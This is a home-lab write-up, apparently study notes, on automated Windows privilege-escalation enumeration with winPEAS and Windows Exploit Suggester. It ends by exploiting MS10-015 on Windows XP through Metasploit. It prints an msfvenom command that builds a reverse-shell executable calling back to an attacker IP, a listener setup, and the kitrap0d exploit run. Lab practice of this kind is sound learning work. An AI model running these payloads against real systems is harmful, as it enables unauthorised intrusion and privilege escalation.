Offensive Windows ~ Automated Tools

Offensive Windows [Part 2]

Offensive Windows ~ Automated Tools

In this 2nd part, I'll be exploring automated tools and techniques that I could use to discover vulnerabilities on a windows machine that I have a foothold on. The main focus throughout this writeup would be placed on discovering the vulnerability and not exploiting it. Thus, Ill be making use of Metasploit to exploit the found vulnerability.

I will be targeting 2 windows based machines in my home lab and successfully exploiting one of them.

  • Microsoft Windows 10 Professional [build 19042]
  • Microsoft Windows XP Professional [Build 2600] ahem vuln ahem

Winpeas

The first tool that I'll be taking a look at is called Winpeas. This is a very popular post exploitation tool that's out right now. I use the Linux version heavily but this is my first time experimenting with the windows version. Soon I realized that this tool helped automate everything I covered in the Manual Enumeration post.

PS C:\Users\Neeranjan\Desktop> ./winPEASx64.exe

System Information

Miscellaneous System Information

Network Information

Firewall Information

Patch Management

Environment Variables


Windows Exploit Suggester

The next tool that I'm gona take a look at is called Windows Exploit Suggester by . This was a tool I recently discovered and have been wanting to test it out ever since. It basically uses a dump of the systeminfo command and an updated exploit database to search for exploits that the machine may be susceptible to.

Pre requisites

Updating Exploit DB

โ”Œโ”€โ”€(root๐Ÿ’€nee)-[~/oscp/others/windowsPe]
โ””โ”€# ./windows-exploit-suggester.py --update

Suggesting Exploit

Windows 10 Professional

โ”Œโ”€โ”€(root๐Ÿ’€nee)-[~/oscp/others/windowsPe]
โ””โ”€# ./windows-exploit-suggester.py --database 2021-03-28-mssb.xls --systeminfo systeminfo.txt

Windows XP Professional

โ”Œโ”€โ”€(root๐Ÿ’€nee)-[~/oscp/others/windowsPe]
โ””โ”€# ./windows-exploit-suggester.py --database 2021-03-28-mssb.xls --systeminfo systeminfoxp.txt
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important

From the output I identified MS10-015 as one of the vulnerabilities that I could exploit.

Exploitation

Payload Generation

โ”Œโ”€โ”€(root๐Ÿ’€nee)-[~/oscp/others/windowsPe]
โ””โ”€# msfvenom -p windows/shell/reverse_tcp LHOST=192.168.136.128  LPORT=4444 -f exe > shell.exe

Listener

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost eth0
lhost => eth0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

Privilege Escalation

meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lhost eth0
lhost => eth0
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 2
session => 2
msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit

Awesome tools! Both of em'! Helps automate most of the time consuming work. Will definitely be using these more often! not metasploit tho

~Nee.